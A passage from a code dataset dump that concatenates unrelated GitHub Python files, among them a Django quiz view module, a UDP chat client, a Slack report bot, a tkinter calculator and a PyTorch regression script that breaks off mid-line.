wb[\"Sheet1\"]\n print(worksheet)\n\n excel_data = list()\n # iterating over the rows and\n # getting value from each cell in row\n for row in worksheet.iter_rows():\n row_data = list()\n q = Question(name=row[0].value,description=row[1].value,answer_description=row[2].value)\n q.save()\n\n for i in range(3,len(row),2):\n o = Option(name=row[i].value,value=row[i+1].value,Question=q)\n o.save()\n\n for cell in row:\n row_data.append(str(cell.value))\n excel_data.append(row_data)\n\n return render(request, 'quiz/quest.html', {\"excel_data\":excel_data})\n else:\n return render(request, 'quiz/quest.html', {})'''\n\n\nclass QuizAnswerDetail(SingleObjectMixin,LoginRequiredMixin,ListView):\n template_name = \"quiz/answer_detail.html\"\n login_url = 'login'\n paginate_by = 10\n \n def get(self, request, *args, **kwargs):\n current_user = request.user \n self.object=self.get_object(queryset=Quiz.objects.all())\n if not Attempt.objects.filter(user=request.user,Quiz=self.object).exists():\n return redirect('home')\n return super().get(request, *args, **kwargs)\n\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['quiz'] = self.object\n \n return context\n\n \n def get_queryset(self):\n return self.object.assignment_set.all()\n\n\n\n\n\n@login_required(login_url='login')\ndef load_question(request):\n data = dict()\n subject = int(request.GET.get('subject'))\n grade = request.GET.get('grade')\n quiz = request.GET.get('quiz')\n get_assigned_questions=Assignment.objects.filter(Quiz=quiz).values_list('Question', flat=True)\n\n if grade:\n if request.user.groups.filter(name='School').exists():\n question = Question.objects.filter(grade__grade=grade,subject=subject,school=request.user.school).exclude(id__in=get_assigned_questions)\n elif request.user.groups.filter(name='Teacher').exists():\n question = Question.objects.filter(grade__grade=grade,subject=subject,created_by=request.user).exclude(id__in=get_assigned_questions)\n\n context={\n \n 'questions' : question, \n \n }\n data['question'] = render_to_string('quiz/question_fly.html', context) \n else:\n data['error'] = \"Something went Wrong\"\n return JsonResponse(data)\n\n\n\n@login_required(login_url='login')\ndef ajax_search_questions(request):\n\n data = dict()\n subject = int(request.GET.get('subject'))\n grade = request.GET.get('grade')\n question = request.GET.get('question')\n quiz = request.GET.get('quiz')\n get_assigned_questions=Assignment.objects.filter(Quiz=quiz).values_list('Question', flat=True)\n print(\"AJAA get serach\")\n if grade:\n \n if request.user.groups.filter(name='College').exists():\n print(\"school\")\n question = Question.objects.filter(subject=subject,description__icontains = question,school=request.user.school).exclude(id__in=get_assigned_questions)\n elif request.user.groups.filter(name='Faculty').exists():\n print(\"Teacher\")\n question = Question.objects.filter(subject=subject,description__icontains = question,created_by=request.user).exclude(id__in=get_assigned_questions) \n print(question) \n context={ \n 'questions' : question,\n }\n data['question'] = render_to_string('quiz/question_fly.html', context) \n data['question_count'] =question.count()\n\n else:\n data['error'] = \"Something went Wrong\"\n return JsonResponse(data)\n\n\n\n\n@login_required(login_url='login')\ndef ajax_load_subjects(request):\n data=dict()\n programme=request.GET.get('grade')\n print(\"degree\",programme)\n subjets = Subject_Assignment.objects.filter(programme=programme).values_list('subject', flat=True).distinct() \n print(\"testoo\",subjets)\n subjects = Subject.objects.filter(id__in=subjets) \n print(subjects)\n context={ \n 'subjects' : subjects, \n }\n data['subjects'] = render_to_string('quiz/choose_subjects.html', context) \n return JsonResponse(data)\n\n\ndef delete_on_test(request,test):\n On_Test.objects.filter(user=request.user,test=test).delete()\n data = dict()\n data['status'] = 'done' \n return JsonResponse(data)","repo_name":"madhanumk/elearn","sub_path":"quiz/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73514688747","text":"#! /usr/bin/env python3\nimport socket\nimport threading\nimport time\nimport os\n\ndef sendThread(name):\n while True:\n message = input()\n if message == 'exit':\n sk.sendto((\"[\" + myname + \"] 退出了聊天室\").encode('utf-8'), ip_port)\n print(\"退出聊天室\")\n sk.close()\n os._exit(0)\n \n message = '[' + myname + '] ' + message\n sk.sendto(message.encode('utf-8'), ip_port)\n print(\"[send] [\" + time.ctime(time.time()) + \"]\")\n print(message)\n print(\"\")\n \n\ndef recvThread(name):\n while True:\n data=sk.recvfrom(1024)#客户端发送的数据存储在recv里,1024指最大接受数据的量\n if data[0].decode('utf-8') == \"exit\":\n print(\"客户端被动关闭socket\")\n break\n \n print (\"[recv] [\" + time.ctime(time.time()) + \"]\")\n print(data[0].decode('utf-8'))\n print(\"\")\n print (\"recv退出线程:\" + name) \n\nip = input(\"请输入服务器ip(xxx.xxx.xxx.xxx):\")\nsk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nport = 10000\nip_port=(ip, port)\nprint(sk)\nprint(\"\")\n\nmyname = input(\"输入你的聊天昵称:\")\nsk.sendto((\"[\" + myname + \"] 进入了聊天室\").encode('utf-8'), ip_port)\n\n# 创建新线程\naRecvThread = threading.Thread(target=recvThread ,args=(\"recv\",))\naSendThread = threading.Thread(target=sendThread ,args=(\"send\",))\naRecvThread.start()\naSendThread.start()\n\nprint(\"\")\naRecvThread.join()\naSendThread.join()\n\n","repo_name":"JunyaoHu/CUMT_StudyFiles","sub_path":"3-2-Linux操作系统/linux-胡钧耀/chat/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"} +{"seq_id":"40822181897","text":"import cv2\nimport numpy as np\n\n# Creating a mask thresholding the image\ndef get_image_mask(input_img, hsv_lower, hsv_upper):\n\thsv_img = cv2.cvtColor(input_img, cv2.COLOR_BGR2HSV)\n\timg_mask = cv2.inRange(hsv_img, hsv_lower, hsv_upper)\n\treturn img_mask\n\ndef is_good(frame):\n ref = cv2.imread(\"WSC_sample.png\")\n N, M = ref.shape[:2]\n\n lower_green = np.array([41,100,100])\n upper_green = np.array([61,255,255])\n t_frame = get_image_mask(frame, lower_green, upper_green)\n t_ref = get_image_mask(ref, lower_green, upper_green)\n\n mean_diff = np.sum(abs(t_frame-t_ref))/(N*M)\n\n MIN_VAL, MAX_VAL = 6, 11\n\n return MIN_VAL < mean_diff < MAX_VAL","repo_name":"arstek131/CVPR-project-USI","sub_path":"Ali_Parisi_CVPR_2/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18884645481","text":"code = next(open('input'))\n\npoints = set(\n i + 1j * j\n for i, line in enumerate(open('input').readlines()[2:])\n for j, c in enumerate(line.strip())\n if c == '#'\n)\n\nfor step in range(50):\n points = set(\n i + 1j * j\n for i in range(-100+step, 200-step)\n for j in range(-100+step, 200-step)\n if code[\n int(''.join(\n str(int(p in points))\n for p in [i + 1j * j + d for d in [-1-1j, -1, -1+1j, -1j, 0, 1j, 1-1j, 1, 1+1j]]),\n 2)\n ] == '#'\n )\n\n if step in {1, 49}:\n print(len(points))","repo_name":"matus-pikuliak/advent_2021","sub_path":"20/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4564756125","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPython Slack Bot class for use with the pythOnBoarding app\n\"\"\"\nimport io\nimport os\nimport message\n\nimport report\n\nfrom slackclient import SlackClient\n\n# To remember which teams have authorized your app and what tokens are\n# associated with each team, we can store this information in memory on\n# as a global object. When your bot is out of development, it's best to\n# save this in a more persistant memory store.\nauthed_teams = {}\n\n\nclass Bot(object):\n \"\"\" Instanciates a Bot object to handle Slack onboarding interactions.\"\"\"\n def __init__(self, name, emoji):\n super(Bot, self).__init__()\n self.name = name\n self.emoji = emoji\n # When we instantiate a new bot object, we can access the app\n # credentials we set earlier in our local development environment.\n self.oauth = {\"client_id\": os.environ.get(\"CLIENT_ID\"),\n \"client_secret\": os.environ.get(\"CLIENT_SECRET\"),\n # Scopes provide and limit permissions to what our app\n # can access. It's important to use the most restricted\n # scope that your app will need.\n \"scope\": \"bot\"}\n self.verification = os.environ.get(\"VERIFICATION_TOKEN\")\n\n # NOTE: Python-slack requires a client connection to generate\n # an oauth token. We can connect to the client without authenticating\n # by passing an empty string as a token and then reinstantiating the\n # client with a valid OAuth token once we have one.\n self.client = SlackClient(\"\")\n # We'll use this dictionary to store the state of each message object.\n # In a production envrionment you'll likely want to store this more\n # persistantly in a database.\n self.messages = {}\n\n def auth(self, code):\n \"\"\"\n Authenticate with OAuth and assign correct scopes.\n Save a dictionary of authed team information in memory on the bot\n object.\n\n Parameters\n ----------\n code : str\n temporary authorization code sent by Slack to be exchanged for an\n OAuth token\n\n \"\"\"\n # After the user has authorized this app for use in their Slack team,\n # Slack returns a temporary authorization code that we'll exchange for\n # an OAuth token using the oauth.access endpoint\n auth_response = self.client.api_call(\n \"oauth.access\",\n client_id=self.oauth[\"client_id\"],\n client_secret=self.oauth[\"client_secret\"],\n code=code\n )\n # To keep track of authorized teams and their associated OAuth tokens,\n # we will save the team ID and bot tokens to the global\n # authed_teams object\n team_id = auth_response[\"team_id\"]\n authed_teams[team_id] = {\"bot_token\":\n auth_response[\"bot\"][\"bot_access_token\"]}\n # Then we'll reconnect to the Slack Client with the correct team's\n # bot token\n self.client = SlackClient(authed_teams[team_id][\"bot_token\"])\n\n def upload_file(self, file, channel, title):\n \"\"\"\n Uploads a file as the method name suggests\n \"\"\"\n client = SlackClient(os.environ.get(\"BOT_TOKEN\"))\n\n client.api_call(\n 'files.upload',\n channels=channel,\n file=file,\n title=title\n )\n\n\n def pleats_response(self, slack_event):\n client = SlackClient(os.environ.get(\"BOT_TOKEN\"))\n\n if 'help' in slack_event['event']['text']:\n client.api_call(\n 'chat.postEphemeral',\n channel=slack_event['event']['channel'],\n text='Hello there, my name is ReportBot :wave:\\nType `/transsum [branch] [client] [start_date] [end_date] [product]` to submit a report right away\\nOr simply type `/transsum` for a report submission dialog prompt',\n user=slack_event['event']['user'],\n username=self.name,\n icon_emoji=self.emoji\n )\n elif 'morning' in slack_event['event']['text']:\n client.api_call(\n 'chat.postMessage',\n channel=slack_event['event']['channel'],\n text='There he is!',\n username=self.name,\n icon_emoji=self.emoji\n )\n else:\n client.api_call(\n 'chat.postMessage',\n channel='scrumlords',\n text='Hello! I did not understand that',\n username=self.name,\n icon_emoji=self.emoji\n )\n\n def upload_report(self, channel, title, start_date, end_date, branch, client, name):\n \"\"\"\n Generates a report and uploads it\n \"\"\"\n generated_report = report.get_report(\n start_date,\n end_date,\n branch,\n client,\n name\n )\n\n with io.StringIO(generated_report) as file:\n self.upload_file(file, channel, title)\n\n def dialog_test(self, trigger_id, user_id):\n client = SlackClient(os.environ.get(\"BOT_TOKEN\"))\n open_dialog = client.api_call(\n \"dialog.open\",\n trigger_id=trigger_id,\n dialog={\n \"title\": \"Trans Summary Report\",\n \"submit_label\": \"Press\",\n \"callback_id\": \"dialog-test\",\n \"elements\": [\n {\n \"label\": \"Branch\",\n \"type\": \"text\",\n \"name\": \"branch_no\",\n },\n {\n \"label\": \"Client\",\n \"type\": \"text\",\n \"name\": \"client_no\",\n },\n {\n \"label\": \"Start Date\",\n \"type\": \"text\",\n \"name\": \"start_date\",\n },\n {\n \"label\": \"End Date\",\n \"type\": \"text\",\n \"name\": \"end_date\",\n },\n {\n \"label\": \"Product\",\n \"type\": \"select\",\n \"name\": \"product\",\n \"placeholder\": \"Select a product\",\n \"options\": [\n {\n \"label\": \"DDS\",\n \"value\": \"dds\"\n },\n {\n \"label\": \"RCX\",\n \"value\": \"rcx\"\n },\n {\n \"label\": \"Both\",\n \"value\": \"ddsrcx\"\n }\n ]\n }\n ]\n }\n )\n print(open_dialog)\n","repo_name":"cjordan2/reportBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":7122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24126764148","text":"from setuptools import find_packages, setup\n\n\nVERSION = '0.1.8'\nDESCRIPTION = 'diffwave'\nAUTHOR = 'LMNT, Inc.'\nAUTHOR_EMAIL = 'github@lmnt.com'\nURL = 'https://www.lmnt.com'\nLICENSE = 'Apache 2.0'\nKEYWORDS = ['diffwave machine learning neural vocoder tts speech']\nCLASSIFIERS = [\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Education',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Topic :: Scientific/Engineering :: Mathematics',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Software Development :: Libraries',\n]\n\n\nsetup(name = 'diffwave',\n version = VERSION,\n description = DESCRIPTION,\n long_description = open('README.md', 'r').read(),\n long_description_content_type = 'text/markdown',\n author = AUTHOR,\n author_email = AUTHOR_EMAIL,\n url = URL,\n license = LICENSE,\n keywords = KEYWORDS,\n packages = find_packages('src'),\n package_dir = { '': 'src' },\n install_requires = [\n 'numpy',\n 'torch>=1.6',\n 'torchaudio>=0.9.0',\n 'tqdm'\n ],\n classifiers = CLASSIFIERS)\n","repo_name":"lmnt-com/diffwave","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":677,"dataset":"github-code","pt":"37"} +{"seq_id":"32011022500","text":"from tkinter import *\nfrom tkinter import ttk\nfrom API import *\n\n\nclass UI:\n def __init__(self, master):\n self.api = API()\n\n self.master = master\n\n self.master.title(\"Search Songsterr\")\n\n self.master.columnconfigure(0, weight=1)\n self.master.rowconfigure(0, weight=1)\n\n mainFrame = ttk.Frame(self.master)\n mainFrame.grid(column=0, row=0, sticky=\"nesw\")\n\n mainFrame.columnconfigure(0, weight=1)\n mainFrame.rowconfigure(1, weight=1)\n\n mainFrame.option_add(\"*font\", \"Helvetica 10\")\n\n searchFrame = ttk.Frame(mainFrame, padding=\"3 3 12 12\")\n searchFrame.grid(column=0, row=0, sticky=\"ew\")\n\n searchFrame.columnconfigure(1, weight=1)\n\n self.query = StringVar()\n\n ttk.Label(searchFrame, text=\"Search\", font=(\"Helvetica\", 10, \"bold\"),\n padding=\"0 0 5 0\").grid(column=0, row=0, sticky=\"ew\")\n\n queryEntry = ttk.Entry(searchFrame, textvariable=self.query)\n queryEntry.grid(column=1, row=0, sticky=\"ew\")\n\n resultFrame = ttk.Frame(mainFrame)\n resultFrame.grid(column=0, row=1, sticky=\"nesw\")\n\n resultFrame.columnconfigure(0, weight=1)\n resultFrame.rowconfigure(0, weight=1)\n\n self.songList = StringVar()\n self.songList.set(\"\")\n\n resultScrollbar = Scrollbar(resultFrame, orient=\"vertical\")\n resultScrollbar.grid(column=1, row=0, sticky=\"ns\")\n\n self.resultList = Listbox(\n resultFrame, yscrollcommand=resultScrollbar.set)\n self.resultList.grid(column=0, row=0, sticky=\"nesw\")\n\n resultScrollbar.config(command=self.resultList.yview)\n\n self.master.bind(\"\", self.search)\n self.resultList.bind(\"\", self.playTab)\n\n queryEntry.focus()\n\n def search(self, *args):\n self.resultList.delete(0, END)\n\n self.songs = self.api.getSongs(self.query.get())\n index = 0\n\n for song in self.songs:\n self.resultList.insert(\n index, song[\"title\"] + \" by \" + song[\"artist\"][\"name\"])\n\n index += 1\n\n def playTab(self, *args):\n if(self.resultList.size() > 0):\n song = self.songs[self.resultList.curselection()[0]]\n\n print(self.api.getTab(song))\n","repo_name":"Ghoelian/songsterr-tab-visualiser","sub_path":"UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6022875916","text":"import tkinter as tk\nwin = tk.Tk()\nwin.geometry(\"321x324\")\nwin.resizable(0, 0)\nwin.title(\"calculator\")\n\n\ninput_value = \"\"\n\ndisplay_txt = tk.StringVar()\n\n\ndef click_button(item):\n global input_value\n input_value = input_value+str(item)\n display_txt.set(input_value)\n\n\ndef clear_button():\n global input_value\n input_value = \"\"\n display_txt.set(\"\")\n\n\ndef equal_button():\n global input_value\n result = str(eval(input_value))\n display_txt.set(result)\n input_value = result # \"\"\n\n\ninput_frame = tk.Frame(win, width=312, height=50, bd=0,\n highlightbackground=\"black\", highlightthickness=2)\ninput_frame.pack(side=tk.TOP)\n\n\ninput_field = tk.Entry(input_frame, font=('arial', 18, 'bold'),\n textvariable=display_txt, width=50, bd=0, justify=tk.RIGHT)\ninput_field.grid(row=0, column=0)\ninput_field.pack(ipady=10)\n\n\nbt_frme = tk.Frame(win, width=321, height=272.5, bg=\"grey\")\nbt_frme.pack()\n\nclear_btn = tk.Button(bt_frme, text=\"C\", fg=\"black\", width=32, height=3, bd=0, bg=\"#eee\",\n cursor=\"hand2\", command=lambda: clear_button()).grid(row=0, column=0, columnspan=3, padx=1, pady=1)\ndivide_btn = tk.Button(bt_frme, text=\"/\", fg=\"black\", width=10, height=3, bd=0, bg=\"#eee\",\n cursor=\"hand2\", command=lambda: click_button(\"/\")).grid(row=0, column=3, padx=1, pady=1)\n\n\nbtn_7 = tk.Button(bt_frme, text=\"7\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"7\")).grid(row=1, column=0, padx=1, pady=1)\nbtn_8 = tk.Button(bt_frme, text=\"8\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"8\")).grid(row=1, column=1, padx=1, pady=1)\nbtn_9 = tk.Button(bt_frme, text=\"9\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"9\")).grid(row=1, column=2, padx=1, pady=1)\nbtn_multi = tk.Button(bt_frme, text=\"*\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"*\")).grid(row=1, column=3, padx=1, pady=1)\n\n\nbtn_4 = tk.Button(bt_frme, text=\"4\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"4\")).grid(row=2, column=0, padx=1, pady=1)\nbtn_5 = tk.Button(bt_frme, text=\"5\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"5\")).grid(row=2, column=1, padx=1, pady=1)\nbtn_7 = tk.Button(bt_frme, text=\"6\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"6\")).grid(row=2, column=2, padx=1, pady=1)\nbtn_sub = tk.Button(bt_frme, text=\"-\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"-\")).grid(row=2, column=3, padx=1, pady=1)\n\n\nbtn_1 = tk.Button(bt_frme, text=\"1\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"1\")).grid(row=3, column=0, padx=1, pady=1)\nbtn_2 = tk.Button(bt_frme, text=\"2\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"2\")).grid(row=3, column=1, padx=1, pady=1)\nbtn_3 = tk.Button(bt_frme, text=\"3\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"3\")).grid(row=3, column=2, padx=1, pady=1)\nbtn_add = tk.Button(bt_frme, text=\"+\", fg=\"black\", width=10, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"+\")).grid(row=3, column=3, padx=1, pady=1)\n\n\nbtn_0 = tk.Button(bt_frme, text=\"0\", fg=\"black\", width=21, height=3, bd=0, bg=\"#fff\",\n cursor=\"hand2\", command=lambda: click_button(\"0\")).grid(row=4, column=0, columnspan=2, padx=1, pady=1)\nbtn_point = tk.Button(bt_frme, text=\".\", fg=\"black\", width=10, height=3, bd=0, bg=\"#eee\",\n cursor=\"hand2\", command=lambda: click_button(\".\")).grid(row=4, column=2, padx=1, pady=1)\nbtn_equal = tk.Button(bt_frme, text=\"=\", fg=\"black\", width=10, height=3, bd=0, bg=\"#eee\",\n cursor=\"hand2\", command=lambda: equal_button()).grid(row=4, column=3, padx=1, pady=1)\n\nwin.mainloop()\n","repo_name":"Arun7303/Python_Calculater","sub_path":"CALC.PY","file_name":"CALC.PY","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1234049080","text":"import argparse\n\nimport torch\n\nparser = argparse.ArgumentParser(description=\"Bikes or not bikes, that is the question\")\n\nparser.add_argument(\"--target\", help=\"Path of the target model\", required=True, type=str)\nparser.add_argument(\"--meta\", help=\"Path of the meta model\", required=True, type=str)\nparser.add_argument(\"--cuda\", help=\"Using GPU or not\", action=\"store_true\")\n\n# Parse arguments\n# --------------------\nargs = parser.parse_args()\n\n# Using CUDA is asked and available\n# --------------------\nuse_cuda = args.cuda and torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n# Load models\n# --------------------\ntarget_model = torch.load(args.target)\nmeta_model = torch.load(args.meta)\n\n# Extract weights from target\n# --------------------\nweights = next(target_model.dense_out.parameters()).to(device)\nanswer_to_life = meta_model(weights)\nprint(\"Meta classifier output: {}\".format(answer_to_life.item()))\nprint(\"{}bikes\".format(\"\" if answer_to_life.item() > 0.5 else \"no \"))\n","repo_name":"XanX3601/IASD-Anonymization-Project","sub_path":"bikes_or_not_bikes_that_is_the_question.py","file_name":"bikes_or_not_bikes_that_is_the_question.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9665504443","text":"# -Binary- search tree using -Arraya-.\nimport numpy as np\n\ntree = np.zeros(100, dtype=\"int16\")\n\n\ndef insert(element):\n o = 0\n while tree[o] != 0:\n if tree[o] > element:\n o = (2 * o) + 1\n else:\n o = (2 * o) + 2\n tree[o] = element\n\n\ndef preorder(root):\n if tree[root] == 0:\n return\n print(tree[root])\n preorder((2 * root) + 1)\n preorder((2 * root) + 2)\n\n\ndef inorder(root):\n if tree[root] == 0:\n return\n inorder((2 * root) + 1)\n print(tree[root])\n inorder((2 * root) + 2)\n\n\ndef postorder(root):\n if tree[root] == 0:\n return\n postorder((2 * root) + 1)\n postorder((2 * root) + 2)\n print(tree[root])\n\n\n\"\"\"Better Call Functions!\"\"\"\nwhile True:\n a = int(input(\"Number of inputs: \"))\n for k in range(0, a):\n insert(int(input(\"Node..Data_\")))\n print(tree)\n print(\"preorder Traversal:-\")\n preorder(0)\n print(\"inorder traversal:-\")\n inorder(root=0)\n print(\"post order Traversal:-\")\n postorder(root=0)\n","repo_name":"aYgCOO/DSA-In-PY","sub_path":"DSA/Non-Linear/Trees/Basic-TRee-Construction/BST-UsingArrays.py","file_name":"BST-UsingArrays.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2662603331","text":"class Circular(object):\n def __init__(self, data, pipe_numbers):\n self.start = 0\n self.state = data\n self.len = len(data)\n self.pipe_numbers = pipe_numbers\n\n def cround(self, i):\n self.start = self.len - i\n\n def satisfy(self):\n for e in self.pipe_numbers:\n i = (self.start + e) % self.len\n if self.state[i] == 0:\n return False\n return True\n\n\ndef rotate(state, pipe_numbers):\n c = Circular(state, pipe_numbers)\n result = []\n for i in range(len(state)):\n c.cround(i)\n if c.satisfy():\n result.append(i)\n return result\n\n\nif __name__ == '__main__':\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert rotate([1, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1], [0, 1]) == [1, 8], \"Example\"\n assert rotate([1, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1], [0, 1, 2]) == [], \"Mission impossible\"\n assert rotate([1, 0, 0, 0, 1, 1, 0, 1], [0, 4, 5]) == [0], \"Don't touch it\"\n assert rotate([1, 0, 0, 0, 1, 1, 0, 1], [5, 4, 5]) == [0, 5], \"Two cannonballs in the same pipe\"\n","repo_name":"AbnerZheng/checkio","sub_path":"incinerator/rotate_hole.py","file_name":"rotate_hole.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32791291873","text":"# define the custom function;\n# the function displays the two inputs, then adds them and prints that.\ndef activity_count(bike_count, run_count):\n print(f\"You went on {bike_count} rides this year.\")\n print(f\"You went on {run_count} runs this year.\")\n total_activities = bike_count + run_count\n print(f\"In total, you had {total_activities} activities this year.\\n\")\n\n# set a prompt for user input\nprompt = \"> \"\n\n# accept integer as total ride count\nprint(\"Please enter the number of bike rides you took this year:\")\nrides = int(input(prompt))\n\n# accept integer as total run count\nprint(\"Please enter the number of runs you went on this year:\")\nruns = int(input(prompt))\n\n# pass values to function\nactivity_count(rides, runs)\n\n# create a divider between function call types\nprint('*' * 15)\n\n#\n# Section 2 - for later: figure out how to make this more efficient\n#\n\n# now obtain a file to get the rides, maybe?\nprint(\"Give me a file with your total rides in it:\")\nride_file = input(\"> \")\n\n# read the file and convert to integer\nride_read = open(ride_file)\nrides_from_file = ride_read.read()\nrides_int = int(rides_from_file)\n\n# obtain a file to read the runs\nprint(\"Give me a file with your total runs in it:\")\nrun_file = input(\"> \")\n\n# read the file and convert to integer\nrun_read = open(run_file)\nruns_from_file = run_read.read()\nruns_int = int(runs_from_file)\n\n# now call the function\nactivity_count(rides_int, runs_int)\n\n# close 'em\nride_read.close()\nrun_read.close()","repo_name":"adellario/pythonthw","sub_path":"Exercises/ex19.2.py","file_name":"ex19.2.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34757862100","text":"from re import X\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error,mean_absolute_error\nfrom scipy.signal import savgol_filter \nimport matplotlib.pyplot as plt\nimport time\nimport os\nimport csv\nimport random\nimport math\nfrom torch.nn import parameter\nrandom.seed(1)\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader,Dataset\nfrom torch.utils.data.dataset import TensorDataset, random_split\n\n\nfrom helper import find_csv,find_sigma\nlinewidth = 3\nfontsize = 14\nfigsize = [10,8]\nfont = {'family' : 'monospace',\n 'weight' : 'bold',\n 'size' : fontsize }\nplt.rc('font', **font) # pass in the font dict as kwargs\npath_to_test_dir = './Test Data'\n\n\nadd_noise = False\nnoise_level = 1e-4\n\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda:0\" if use_cuda else \"cpu\")\n\ndef read_feature(file_name = 'features.csv'):\n data = pd.read_csv(file_name)\n data = data.fillna(0.0)\n\n\n targets = data[['Log10scanRate','Log10keq','Log10kf']]\n features = data.drop(['Log10scanRate','Log10keq','Log10kf'],axis=1)\n\n\n\n return features.to_numpy(),targets.to_numpy()\n\n\ndef load_data(features,targets):\n feature_tensor = torch.from_numpy(features)\n target_tensor = torch.from_numpy(targets)\n\n dataset = TensorDataset(feature_tensor,target_tensor)\n\n train_dataset, val_dataset = random_split(dataset,[int(len(dataset)*0.8),len(dataset)- int(len(dataset)*0.8)])\n\n train_loader = DataLoader(train_dataset,batch_size=24,shuffle=True)\n val_loader = DataLoader(val_dataset,batch_size=16,shuffle=True)\n\n return train_loader,val_loader\n\n\n\n# Multiheaded DNN\nclass model(nn.Module):\n def __init__(self,input_shape=None,output_shape=None):\n super().__init__()\n\n self.d1 = nn.Linear(input_shape,256)\n self.d2 = nn.Linear(256,128)\n self.d3 = nn.Linear(128,64)\n self.d4 = nn.Linear(64,32)\n\n self.d5 = nn.Linear(input_shape,256)\n self.d6 = nn.Linear(256,128)\n self.d7 = nn.Linear(128,64)\n self.d8 = nn.Linear(64,32)\n\n self.out = nn.Linear(64,3)\n\n self.history = {'train_loss':list(),'val_loss':list()}\n\n def forward(self,x):\n x1 = F.relu(self.d1(x))\n x1 = F.relu(self.d2(x1))\n x1 = F.relu(self.d3(x1))\n x1 = F.relu(self.d4(x1))\n\n\n x2 = F.relu(self.d5(x))\n x2 = F.relu(self.d6(x2))\n x2 = F.relu(self.d7(x2))\n x2 = F.relu(self.d8(x2))\n\n x = torch.cat((x1,x2),dim=1)\n\n x = self.out(x)\n return x\n\ndef extract(df,sigma):\n\n df.columns = ['Theta','Flux']\n\n #df['Flux'] = df['Flux'] / np.sqrt(sigma)\n\n cv_forward = df[:int(len(df)/2)]\n cv_backward = df[int(len(df)/2):]\n #print(df.head())\n cv_backward = cv_backward.reset_index(drop=True) #Use drop to discard the old index \n #print(cv_backward.head())\n forward_peak_flux = cv_forward['Flux'].min()\n forward_peak_potential = cv_forward['Theta'].iloc[cv_forward['Flux'].idxmin()]\n #print(forward_peak_flux)\n #print(forward_peak_potential)\n backward_peak_flux = cv_backward['Flux'].max()\n backward_peak_potential = cv_backward['Theta'].iloc[cv_backward['Flux'].idxmax()]\n #print(backward_peak_flux)\n #print(backward_peak_potential)\n phase1 = cv_forward[:cv_forward['Flux'].idxmin()]\n phase3 = cv_backward[:cv_backward['Flux'].idxmax()]\n #print(phase1.tail())\n #print(phase3.tail())\n points1 = np.linspace(0.01,1,num=100)*forward_peak_flux\n points3= cv_backward['Flux'].iloc[ 